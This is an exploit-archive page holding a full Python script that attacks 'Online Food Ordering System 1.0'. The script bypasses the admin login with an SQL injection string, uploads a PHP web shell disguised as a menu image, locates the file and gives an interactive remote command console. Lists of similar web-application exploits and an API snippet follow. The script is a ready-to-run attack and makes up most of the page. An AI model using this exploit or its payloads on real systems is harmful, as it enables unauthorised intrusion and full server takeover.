Become a patron and gain access to the dashboard, Schedule scan, API and Search

Search for hundreds of thousands of exploits

"Online Food Ordering System 1.0 - Remote Code Execution"

Author

Exploit author

"Eren Şimşek"

Platform

Exploit platform

php

Release date

Exploit published date

2020-09-23

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
# Exploit Title: Online Food Ordering System 1.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-22
# Exploit Author: Eren Şimşek
# Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip
# Version: 1.0
# Tested on: Windows/Linux - XAMPP Server
# CVE : N/A

# Setup: pip3 install bs4 .

# Exploit Code :


import requests,sys,string,random
from bs4 import BeautifulSoup

def get_random_string(length):
    letters = string.ascii_lowercase
    result_str = ''.join(random.choice(letters) for i in range(length))
    return result_str

session = requests.session()
Domain = ""
RandomFileName = get_random_string(5)+".php"
def Help():
    print("[?] Usage: python AporlorRCE.py <Domain>")

def Upload():
    session = requests.session()
    burp0_url = Domain+"/admin/ajax.php?action=save_menu"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/index.php?page=menu", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------21991269520298699981411767018", "Connection": "close"}
    burp0_data = "-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"description\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"status\"\r\n\r\non\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"category_id\"\r\n\r\n3\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"price\"\r\n\r\n1\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+RandomFileName+"\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n-----------------------------21991269520298699981411767018--\r\n"
    try:
        Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
        if Resp == "1":
            print("[+] Shell Upload Success")
        else:
            print("[-] Shell Upload Failed")
    except:
        print("[-] Request Failed")
        Help()

def Login():
    burp0_url = Domain+"/admin/ajax.php?action=login"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/login.php", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
    burp0_data = {"username": "' OR 1=1 #", "password": "' OR 1=1 #"}
    try:
        Resp = session.post(burp0_url, headers=burp0_headers,data=burp0_data)
        if Resp.text == "1":
            print("[+] Login Success")
        else:
            print("[+] Login Failed")
    except:
        print("[-] Request Failed")
        Help()

def FoundMyRCE():
    global FileName
    burp0_url = Domain+"/admin/index.php?page=menu"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    try:
        Resp = session.get(burp0_url, headers=burp0_headers)
        Soup = BeautifulSoup(Resp.text, "html5lib")
        Data = Soup.find_all("img")
        for MyRCE in Data:
            if RandomFileName in MyRCE["src"]:
                FileName = MyRCE["src"].strip("../assets/img/")
                print("[+] Found File Name: " + MyRCE["src"].strip("../assets/img/"))
    except:
        print("[-] Request Failed")
        Help()

def Terminal():
    while True:
        Command = input("Console: ")
        burp0_url = Domain+"/assets/img/"+FileName+"?cmd="+Command
        try:
            Resp = session.get(burp0_url)
            print(Resp.text)
        except KeyboardInterrupt:
            print("[+] KeyboardInterrupt Stop, Thanks For Use Aporlorxl23")
        except:
            print("[-] Request Error")
if __name__ == "__main__":
    if len(sys.argv) == 2:
        Domain = sys.argv[1]
        Login()
        Upload()
        FoundMyRCE()
        Terminal()
    else:
        Help()
Release Date Title Type Platform Author
2020-10-16 "Seat Reservation System 1.0 - Remote Code Execution (Unauthenticated)" webapps php "Rahul Ramkumar"
2020-10-16 "Hotel Management System 1.0 - Remote Code Execution (Authenticated)" webapps php Aporlorxl23
2020-10-16 "Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)" webapps php b1nary
2020-10-16 "aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)" webapps python "Ünsal Furkan Harani"
2020-10-16 "Employee Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "Company Visitor Management System (CVMS) 1.0 - Authentication Bypass" webapps php "Oğuz Türkgenç"
2020-10-16 "Employee Management System 1.0 - Cross Site Scripting (Stored)" webapps php "Ankita Pal"
2020-10-16 "Alumni Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "CS-Cart 1.3.3 - authenticated RCE" webapps php 0xmmnbassel
2020-10-16 "Seat Reservation System 1.0 - Unauthenticated SQL Injection" webapps php "Rahul Ramkumar"
Release Date Title Type Platform Author
2020-10-16 "Seat Reservation System 1.0 - Remote Code Execution (Unauthenticated)" webapps php "Rahul Ramkumar"
2020-10-16 "Seat Reservation System 1.0 - Unauthenticated SQL Injection" webapps php "Rahul Ramkumar"
2020-10-16 "Company Visitor Management System (CVMS) 1.0 - Authentication Bypass" webapps php "Oğuz Türkgenç"
2020-10-16 "Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)" webapps php b1nary
2020-10-16 "Alumni Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "Hotel Management System 1.0 - Remote Code Execution (Authenticated)" webapps php Aporlorxl23
2020-10-16 "CS-Cart 1.3.3 - authenticated RCE" webapps php 0xmmnbassel
2020-10-16 "Employee Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "Employee Management System 1.0 - Cross Site Scripting (Stored)" webapps php "Ankita Pal"
2020-10-16 "CS-Cart 1.3.3 - 'classes_dir' LFI" webapps php 0xmmnbassel
Release Date Title Type Platform Author
2020-09-23 "Online Food Ordering System 1.0 - Remote Code Execution" webapps php "Eren Şimşek"
2020-06-23 "Responsive Online Blog 1.0 - 'id' SQL Injection" webapps php "Eren Şimşek"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48827/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.